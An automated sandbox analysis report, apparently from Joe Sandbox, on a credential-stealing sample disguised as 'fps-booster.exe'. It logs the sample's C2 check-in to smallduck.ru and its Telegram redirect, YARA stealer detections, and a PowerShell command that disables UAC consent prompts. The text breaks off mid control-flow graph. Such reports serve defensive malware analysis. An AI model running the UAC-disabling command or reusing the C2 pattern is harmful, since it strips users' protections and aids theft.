            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
            2024-07-26T01:15:23.555322+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972240.127.169.103192.168.2.6
            2024-07-26T01:14:31.085025+0200TCP2041654ET MALWARE Win32/DuckLogs Malware Activity (GET)49710443192.168.2.6217.78.239.114
            2024-07-26T01:14:46.020724+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971840.68.123.157192.168.2.6

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 26, 2024 01:14:29.857708931 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:29.857748985 CEST44349710217.78.239.114192.168.2.6
            Jul 26, 2024 01:14:29.857815027 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:29.910310984 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:29.910337925 CEST44349710217.78.239.114192.168.2.6
            Jul 26, 2024 01:14:30.618634939 CEST44349710217.78.239.114192.168.2.6
            Jul 26, 2024 01:14:30.618778944 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:30.622678041 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:30.622699976 CEST44349710217.78.239.114192.168.2.6
            Jul 26, 2024 01:14:30.622967005 CEST44349710217.78.239.114192.168.2.6
            Jul 26, 2024 01:14:30.668389082 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:30.680984020 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:30.724507093 CEST44349710217.78.239.114192.168.2.6
            Jul 26, 2024 01:14:30.724631071 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:30.724647045 CEST44349710217.78.239.114192.168.2.6
            Jul 26, 2024 01:14:31.085051060 CEST44349710217.78.239.114192.168.2.6
            Jul 26, 2024 01:14:31.085124969 CEST44349710217.78.239.114192.168.2.6
            Jul 26, 2024 01:14:31.085201025 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:31.091348886 CEST49710443192.168.2.6217.78.239.114
            Jul 26, 2024 01:14:31.101557970 CEST49711443192.168.2.6149.154.167.99
            Jul 26, 2024 01:14:31.101630926 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:31.101721048 CEST49711443192.168.2.6149.154.167.99
            Jul 26, 2024 01:14:31.102144003 CEST49711443192.168.2.6149.154.167.99
            Jul 26, 2024 01:14:31.102174997 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:31.760093927 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:31.760301113 CEST49711443192.168.2.6149.154.167.99
            Jul 26, 2024 01:14:31.762974977 CEST49711443192.168.2.6149.154.167.99
            Jul 26, 2024 01:14:31.763003111 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:31.763271093 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:31.764935017 CEST49711443192.168.2.6149.154.167.99
            Jul 26, 2024 01:14:31.808510065 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:31.808661938 CEST49711443192.168.2.6149.154.167.99
            Jul 26, 2024 01:14:31.808715105 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:32.027894974 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:32.027926922 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:32.027977943 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:32.027997017 CEST44349711149.154.167.99192.168.2.6
            Jul 26, 2024 01:14:32.028037071 CEST49711443192.168.2.6149.154.167.99
            Jul 26, 2024 01:14:32.028074980 CEST49711443192.168.2.6149.154.167.99
            Jul 26, 2024 01:14:32.038127899 CEST49711443192.168.2.6149.154.167.99

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jul 26, 2024 01:14:29.499272108 CEST5957353192.168.2.61.1.1.1
            Jul 26, 2024 01:14:29.852195978 CEST53595731.1.1.1192.168.2.6
            Jul 26, 2024 01:14:31.092550039 CEST6293753192.168.2.61.1.1.1
            Jul 26, 2024 01:14:31.100812912 CEST53629371.1.1.1192.168.2.6

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jul 26, 2024 01:14:29.499272108 CEST192.168.2.61.1.1.10x144fStandard query (0)smallduck.ruA (IP address)IN (0x0001)false
            Jul 26, 2024 01:14:31.092550039 CEST192.168.2.61.1.1.10x47e1Standard query (0)t.meA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 26, 2024 01:14:29.852195978 CEST1.1.1.1192.168.2.60x144fNo error (0)smallduck.ru217.78.239.114A (IP address)IN (0x0001)false
            Jul 26, 2024 01:14:31.100812912 CEST1.1.1.1192.168.2.60x47e1No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false

            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.649710217.78.239.1144431488C:\Users\user\Desktop\fps-booster.exe
            TimestampBytes transferredDirectionData
            2024-07-25 23:14:30 UTC73OUTGET /api.php?type=clipper&uid=1877&secret=wPYci5e0GiV2FngCxMdf HTTP/1.1
            2024-07-25 23:14:30 UTC77OUTData Raw: 48 6f 73 74 3a 20 73 6d 61 6c 6c 64 75 63 6b 2e 72 75 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 64 65 66 6c 61 74 65 0d 0a 0d 0a
            Data Ascii: Host: smallduck.ruConnection: keep-aliveAccept-Encoding: gzip,deflate
            2024-07-25 23:14:31 UTC234INHTTP/1.1 301 Moved Permanently
            Server: nginx/1.18.0 (Ubuntu)
            Date: Thu, 25 Jul 2024 23:14:30 GMT
            Content-Type: text/html
            Content-Length: 178
            Connection: close
            Location: https://t.me/+KXQGBw_yd2o1ZmYy
            Content-Type: text/html
            2024-07-25 23:14:31 UTC178INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.649711149.154.167.994431488C:\Users\user\Desktop\fps-booster.exe
            TimestampBytes transferredDirectionData
            2024-07-25 23:14:31 UTC33OUTGET /+KXQGBw_yd2o1ZmYy HTTP/1.1
            2024-07-25 23:14:31 UTC69OUTData Raw: 48 6f 73 74 3a 20 74 2e 6d 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 64 65 66 6c 61 74 65 0d 0a 0d 0a
            Data Ascii: Host: t.meConnection: keep-aliveAccept-Encoding: gzip,deflate
            2024-07-25 23:14:32 UTC512INHTTP/1.1 200 OK
            Server: nginx/1.18.0
            Date: Thu, 25 Jul 2024 23:14:31 GMT
            Content-Type: text/html; charset=utf-8
            Content-Length: 10801
            Connection: close
            Set-Cookie: stel_ssid=31eaee9b5c3920a1b3_16019558873433153298; expires=Fri, 26 Jul 2024 23:14:31 GMT; path=/; samesite=None; secure; HttpOnly
            Pragma: no-cache
            Cache-control: no-store
            X-Frame-Options: ALLOW-FROM https://web.telegram.org
            Content-Security-Policy: frame-ancestors https://web.telegram.org
            Strict-Transport-Security: max-age=35768000
            2024-07-25 23:14:32 UTC10801INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 4a 6f 69 6e 20 47 72 6f 75 70 20 43 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Join Group Chat</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:19:14:26
            Start date:25/07/2024
            Path:C:\Users\user\Desktop\fps-booster.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\fps-booster.exe"
            Imagebase:0x870000
            File size:1'021'952 bytes
            MD5 hash:913B3CAEAB0B292DA088EA75C53AC17E
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
            Reputation:low
            Has exited:true

            General

            Target ID:2
            Start time:19:14:27
            Start date:25/07/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
            Imagebase:0x1b0000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:3
            Start time:19:14:27
            Start date:25/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:6
            Start time:19:14:31
            Start date:25/07/2024
            Path:C:\Windows\SysWOW64\WerFault.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 2724
            Imagebase:0x9e0000
            File size:483'680 bytes
            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:7.4%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:3
              Total number of Limit Nodes:0
              execution_graph 21696 133d100 21697 133d148 VirtualProtect 21696->21697 21698 133d182 21697->21698

              Executed Functions

              Function 0B2F66F0 Relevance: 3.5, Strings: 2, Instructions: 971COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: VC5?$rXlS
              • API String ID: 0-3822480623
              • Opcode ID: 0bd24c438af224356a1b939f25a6199a6ca34af03c050ff8d9a96401c4bf598d
              • Instruction ID: 6bb76b63f2627deccb7d278d52d8b2fa792301f7e468fbcef994336facfdc076
              • Opcode Fuzzy Hash: 0bd24c438af224356a1b939f25a6199a6ca34af03c050ff8d9a96401c4bf598d
              • Instruction Fuzzy Hash: F3A22574E2022ACFDB64DF64D99879EBBB6FB88601F0045A9D44AE7340DB359E81CF41
              Function 0B2F642C Relevance: 2.1, Strings: 1, Instructions: 814COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: rXlS
              • API String ID: 0-3120032998
              • Opcode ID: 1db02ab1903c4381fe6b0bebdce415e5e27c5d9d33f0951b32d5818def3d593e
              • Instruction ID: 7d9163d9bba20518bd11fe6062d37472d35f44da4f63d07520e0fff85986d6c9
              • Opcode Fuzzy Hash: 1db02ab1903c4381fe6b0bebdce415e5e27c5d9d33f0951b32d5818def3d593e
              • Instruction Fuzzy Hash: 19223A74E21229CFDB249F74D95866DBBB6FF88601F0045A9D84AE7284DF368E90CF41
              Function 0B2F4B48 Relevance: .9, Instructions: 898COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 731c202940d8638cc2098494e0fe073d08d9f9d1e64d17edf30fcefdf492b40d
              • Instruction ID: c6c053dc35f0acc6408953c2070df63a12a1e014666b3d26d1ab8e8c8337da6c
              • Opcode Fuzzy Hash: 731c202940d8638cc2098494e0fe073d08d9f9d1e64d17edf30fcefdf492b40d
              • Instruction Fuzzy Hash: 7162E0347246028FDB14EB68D4D4B6EBBB2FF98700F10856AE612CB795DBB4E841CB51
              Function 01330868 Relevance: .7, Instructions: 658COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1388 1330868-13308af 1521 13308b4 call 1330868 1388->1521 1522 13308b4 call 1330858 1388->1522 1392 13308ba-133096f 1406 1330a47-1330a9e 1392->1406 1407 1330975-133097d 1392->1407 1416 1330aa1-1330ab9 1406->1416 1407->1406 1408 1330983-1330990 1407->1408 1408->1406 1409 1330996-13309a3 1408->1409 1409->1406 1411 13309a9-13309e1 1409->1411 1421 13309e3-13309ef 1411->1421 1422 13309f1-13309fc 1411->1422 1419 1330ac5-1330adc 1416->1419 1420 1330abb-1330ac3 1416->1420 1423 1330f82-1330fde call 133013c 1419->1423 1424 1330ae2-1330b15 1419->1424 1420->1419 1421->1422 1426 1330a02-1330a06 1422->1426 1451 1330fe0-1330ffa 1423->1451 1424->1423 1438 1330b1b-1330b26 1424->1438 1429 1330a18 1426->1429 1430 1330a08-1330a16 1426->1430 1431 1330a1a-1330a1c 1429->1431 1430->1431 1432 1330a1e-1330a24 1431->1432 1433 1330a3d-1330a46 1431->1433 1436 1330a32-1330a3c 1432->1436 1437 1330a26-1330a28 1432->1437 1437->1436 1438->1416 1441 1330b2c-1330b35 1438->1441 1441->1423 1442 1330b3b-1330b47 1441->1442 1442->1423 1444 1330b4d-1330b62 1442->1444 1444->1423 1445 1330b68-1330b71 1444->1445 1445->1423 1447 1330b77-1330b8c 1445->1447 1447->1423 1448 1330b92-1330b9b 1447->1448 1448->1423 1450 1330ba1-1330bb6 1448->1450 1450->1423 1452 1330bbc-1330bc5 1450->1452 1457 1330ffc-1331007 call 13312d9 1451->1457 1452->1423 1453 1330bcb-1330be1 1452->1453 1453->1423 1454 1330be7-1330bf0 1453->1454 1454->1423 1456 1330bf6-1330c0c 1454->1456 1456->1423 1458 1330c12-1330c1b 1456->1458 1462 1331009-1331023 1457->1462 1458->1423 1459 1330c21-1330c37 1458->1459 1459->1423 1461 1330c3d-1330c46 1459->1461 1461->1423 1463 1330c4c-1330c61 1461->1463 1466 1331025-133103d 1462->1466 1463->1423 1464 1330c67-1330c70 1463->1464 1464->1423 1467 1330c76-1330c8b 1464->1467 1471 133104b-13310a0 call 133014c call 13314ef 1466->1471 1472 133103f-1331043 1466->1472 1467->1423 1468 1330c91-1330c9a 1467->1468 1468->1423 1470 1330ca0-1330cb5 1468->1470 1470->1423 1473 1330cbb-1330cc4 1470->1473 1491 13310a6-13310af 1471->1491 1472->1471 1473->1423 1474 1330cca-1330ce0 1473->1474 1474->1423 1476 1330ce6-1330cef 1474->1476 1476->1423 1477 1330cf5-1330d0b 1476->1477 1477->1423 1479 1330d11-1330d1a 1477->1479 1479->1423 1480 1330d20-1330d35 1479->1480 1480->1423 1481 1330d3b-1330d44 1480->1481 1481->1423 1483 1330d4a-1330d5f 1481->1483 1483->1423 1485 1330d65-1330d6e 1483->1485 1485->1423 1487 1330d74-1330d89 1485->1487 1487->1423 1488 1330d8f-1330d98 1487->1488 1488->1423 1490 1330d9e-1330db3 1488->1490 1490->1423 1492 1330db9-1330dc2 1490->1492 1492->1423 1493 1330dc8-1330dd7 1492->1493 1493->1423 1494 1330ddd-1330e11 1493->1494 1497 1330ec7-1330ed3 1494->1497 1498 1330e17 1494->1498 1519 1330ed6 call 1330868 1497->1519 1520 1330ed6 call 1330858 1497->1520 1499 1330e1a-1330e2e 1498->1499 1499->1423 1500 1330e34-1330e49 1499->1500 1500->1423 1502 1330e4f-1330e5e 1500->1502 1502->1423 1503 1330e64-1330e76 1502->1503 1503->1423 1505 1330e7c-1330e8f 1503->1505 1504 1330edc-1330f1f 1511 1330f21 1504->1511 1512 1330f77-1330f81 1504->1512 1505->1423 1506 1330e95-1330ea7 1505->1506 1506->1423 1508 1330ead-1330ec1 1506->1508 1508->1497 1508->1499 1513 1330f24-1330f3c 1511->1513 1514 1330f6e-1330f75 1513->1514 1515 1330f3e-1330f56 1513->1515 1514->1512 1514->1513 1517 1330f62-1330f6b 1515->1517 1518 1330f58-1330f60 1515->1518 1517->1514 1518->1517 1519->1504 1520->1504 1521->1392 1522->1392
              Memory Dump Source
              • Source File: 00000000.00000002.2484301401.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1330000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1dc9c870da3ced27bbf72679d181d0d4e7ea69bb4c7defb9a31e1bf4531d8a7a
              • Instruction ID: b72fa23f33bfa49c456e554ed9952e41dc936a00cc7bd9a129ceeee1337fd912
              • Opcode Fuzzy Hash: 1dc9c870da3ced27bbf72679d181d0d4e7ea69bb4c7defb9a31e1bf4531d8a7a
              • Instruction Fuzzy Hash: 06425875F001189FDB18CFA9D880AAEBBB2BF88304F158165F459AB366D731ED45CB90
              Function 013314EF Relevance: .6, Instructions: 614COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1525 13314ef-1331514 1526 1331586-1331593 1525->1526 1527 1331516-1331535 1525->1527 1529 1331537-133156a 1527->1529 1530 1331594-13315c3 1527->1530 1529->1530 1535 133156c-1331584 1529->1535 1680 13315c5 call 1331b28 1530->1680 1681 13315c5 call 13314ef 1530->1681 1533 13315cb-13315f1 1536 1331603-133160f 1533->1536 1537 13315f3 1533->1537 1535->1526 1535->1527 1540 1331b12-1331b49 call 1331cf0 1536->1540 1541 1331615-1331641 1536->1541 1538 1331ad0-1331ad9 1537->1538 1539 13315f9-13315fd 1537->1539 1543 1331adb 1538->1543 1544 1331aea-1331afa call 1331cf0 1538->1544 1539->1536 1539->1538 1561 1331b4f-1331b5c 1540->1561 1541->1540 1562 1331647-1331653 1541->1562 1545 1331ae1-1331ae4 1543->1545 1546 13316b8-13316cc 1543->1546 1555 1331b00-1331b0f 1544->1555 1545->1544 1545->1546 1546->1540 1550 13316d2-13316e1 1546->1550 1556 13316e7-13316f1 1550->1556 1557 133184e-1331857 1550->1557 1559 13316f3 1556->1559 1560 13316f6-13316fc 1556->1560 1557->1540 1563 133185d-133186d 1557->1563 1559->1560 1560->1540 1564 1331702-133170e 1560->1564 1575 1331b66 1561->1575 1576 1331b5e-1331b63 1561->1576 1565 1331655-133165d 1562->1565 1571 1331873-133187c 1563->1571 1572 13319cd-13319fa 1563->1572 1567 1331782-13317b1 1564->1567 1568 1331710-1331723 1564->1568 1565->1540 1570 1331663-133167b 1565->1570 1567->1540 1577 13317b7-13317c0 1567->1577 1573 1331725 1568->1573 1574 1331728-133172e 1568->1574 1570->1565 1583 133167d-1331688 1570->1583 1571->1540 1578 1331882-1331891 1571->1578 1590 1331a03 1572->1590 1591 13319fc-1331a01 1572->1591 1573->1574 1574->1540 1580 1331734-1331768 1574->1580 1581 1331b68-1331b6e 1575->1581 1576->1575 1582 13317c2-13317c7 1577->1582 1596 1331897-13318a5 1578->1596 1597 133193b-1331944 1578->1597 1580->1540 1585 133176e-1331780 1580->1585 1586 1331bc0-1331bc6 1581->1586 1587 1331b70-1331b7c 1581->1587 1582->1540 1588 13317cd-13317e6 1582->1588 1598 1331690-13316a7 1583->1598 1609 13317f0-1331802 1585->1609 1593 1331c91-1331cc6 1586->1593 1594 1331bcc-1331bdc 1586->1594 1592 1331b7f-1331b91 1587->1592 1588->1582 1604 13317e8-13317ea 1588->1604 1599 1331a08-1331a19 1590->1599 1591->1599 1592->1593 1601 1331b97-1331baa 1592->1601 1628 1331cc8-1331ce7 1593->1628 1594->1593 1602 1331be2-1331bf2 1594->1602 1596->1540 1606 13318ab-13318ba 1596->1606 1597->1540 1605 133194a-1331959 1597->1605 1598->1546 1608 13316a9 1598->1608 1599->1540 1621 1331a1f-1331a31 1599->1621 1601->1593 1610 1331bb0-1331bbe 1601->1610 1602->1593 1603 1331bf8-1331c08 1602->1603 1603->1593 1611 1331c0e-1331c1c 1603->1611 1604->1609 1624 1331960-1331969 1605->1624 1625 133195b-133195e 1605->1625 1626 13318c0-13318c7 1606->1626 1627 133199d-13319b8 1606->1627 1608->1544 1613 13316af-13316b2 1608->1613 1609->1540 1612 1331808-1331812 1609->1612 1610->1586 1610->1592 1611->1581 1615 1331c22-1331c2f 1611->1615 1616 1331814 1612->1616 1617 133181a-133181e 1612->1617 1613->1544 1613->1546 1641 1331c32-1331c38 1615->1641 1616->1617 1622 1331820-1331825 1617->1622 1623 1331827-133182b 1617->1623 1638 1331a33-1331a4d 1621->1638 1639 1331a8b 1621->1639 1631 1331837-1331849 1622->1631 1633 1331833 1623->1633 1634 133182d-1331831 1623->1634 1624->1540 1635 133196f-133197e 1624->1635 1632 1331994-133199a 1625->1632 1636 13318d0 1626->1636 1637 13318c9-13318ce 1626->1637 1646 13319c1 1627->1646 1647 13319ba-13319bf 1627->1647 1653 1331ce9-1331ced 1628->1653 1631->1538 1632->1627 1633->1631 1634->1631 1657 1331980-1331983 1635->1657 1658 1331985-133198b 1635->1658 1642 13318d5-13318e7 1636->1642 1637->1642 1644 1331a66-1331a89 1638->1644 1645 1331a4f-1331a64 1638->1645 1649 1331a8e-1331a96 1639->1649 1641->1593 1648 1331c3a-1331c48 1641->1648 1651 13318e9 1642->1651 1652 13318ec-13318f2 1642->1652 1644->1649 1645->1649 1654 13319c6-13319c8 1646->1654 1647->1654 1648->1641 1670 1331c4a-1331c4f 1648->1670 1655 1331a98 1649->1655 1656 1331a9f-1331aa2 1649->1656 1651->1652 1652->1540 1659 13318f8-133190c 1652->1659 1654->1649 1660 1331aa4-1331aa8 1655->1660 1666 1331a9a-1331a9d 1655->1666 1656->1660 1661 1331aaa-1331acd 1656->1661 1667 133198e-1331991 1657->1667 1658->1667 1659->1540 1662 1331912-133191c 1659->1662 1660->1544 1660->1661 1661->1538 1668 1331924-1331936 1662->1668 1669 133191e 1662->1669 1666->1656 1666->1660 1667->1632 1668->1538 1669->1668 1673 1331c52-1331c54 1670->1673 1673->1593 1674 1331c56-1331c64 1673->1674 1674->1673 1675 1331c66-1331c8e 1674->1675 1680->1533 1681->1533
              Memory Dump Source
              • Source File: 00000000.00000002.2484301401.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1330000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 48416731e73f44848f993cb4cb0d856b11411935afea36a7f675db6a57b1f780
              • Instruction ID: a6c4adb0bad6e4a216f6537ab8ec680fdd379485138ae1e35d939d22744f58cf
              • Opcode Fuzzy Hash: 48416731e73f44848f993cb4cb0d856b11411935afea36a7f675db6a57b1f780
              • Instruction Fuzzy Hash: ED427D71A00605CFCB15CF68C9849AEBBF2FF88314B298968D4869B755D735F842CF98
              Function 0133D938 Relevance: .2, Instructions: 151COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2484301401.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1330000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e9a6769dd8092c8fd443219e8af594efcc74f9a4ce5ad169a569be61eba3a0e7
              • Instruction ID: 3e760736a51a6fe44998e13a774340672d1b981c2c9ec17d95571583c2c4ee37
              • Opcode Fuzzy Hash: e9a6769dd8092c8fd443219e8af594efcc74f9a4ce5ad169a569be61eba3a0e7
              • Instruction Fuzzy Hash: 2051F772B041098FD744DBADC944A7FBABBFBC8614F518066E10AEB758CA71CD028B55
              Function 0B2FAFF7 Relevance: 1.8, Strings: 1, Instructions: 520COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 958 b2faff7-b2fb00c 959 b2fb00e-b2fb017 958->959 960 b2fb048-b2fb05c 958->960 963 b2fb03c-b2fb046 959->963 964 b2fb019-b2fb023 959->964 961 b2fb05e-b2fb067 960->961 962 b2fb098-b2fb0ac 960->962 965 b2fb08c-b2fb096 961->965 966 b2fb069-b2fb073 961->966 969 b2fb0ae-b2fb0b7 962->969 970 b2fb0e8-b2fb0fc 962->970 963->960 967 b2fb038-b2fb03b 964->967 968 b2fb025-b2fb036 964->968 965->962 971 b2fb088-b2fb08b 966->971 972 b2fb075-b2fb086 966->972 968->967 975 b2fb0dc-b2fb0e6 969->975 976 b2fb0b9-b2fb0c3 969->976 973 b2fb0fe-b2fb107 970->973 974 b2fb138-b2fb14c 970->974 972->971 978 b2fb12c-b2fb136 973->978 979 b2fb109-b2fb113 973->979 984 b2fb14e-b2fb157 974->984 985 b2fb188-b2fb19c 974->985 975->970 982 b2fb0d8-b2fb0db 976->982 983 b2fb0c5-b2fb0d6 976->983 978->974 988 b2fb128-b2fb12b 979->988 989 b2fb115-b2fb126 979->989 983->982 992 b2fb17c-b2fb186 984->992 993 b2fb159-b2fb163 984->993 990 b2fb19e-b2fb1a7 985->990 991 b2fb1d8-b2fb1ec 985->991 989->988 998 b2fb1cc-b2fb1d6 990->998 999 b2fb1a9-b2fb1b3 990->999 996 b2fb1ee-b2fb1f7 991->996 997 b2fb228-b2fb23c 991->997 992->985 994 b2fb178-b2fb17b 993->994 995 b2fb165-b2fb176 993->995 995->994 1002 b2fb21c-b2fb226 996->1002 1003 b2fb1f9-b2fb203 996->1003 1008 b2fb23e-b2fb247 997->1008 1009 b2fb278-b2fb28c 997->1009 998->991 1006 b2fb1c8-b2fb1cb 999->1006 1007 b2fb1b5-b2fb1c6 999->1007 1002->997 1012 b2fb218-b2fb21b 1003->1012 1013 b2fb205-b2fb216 1003->1013 1007->1006 1016 b2fb26c-b2fb276 1008->1016 1017 b2fb249-b2fb253 1008->1017 1014 b2fb28e-b2fb297 1009->1014 1015 b2fb2c8 1009->1015 1013->1012 1020 b2fb2bc-b2fb2bd 1014->1020 1021 b2fb299-b2fb2a3 1014->1021 1018 b2fb25f-b2fb266 1015->1018 1019 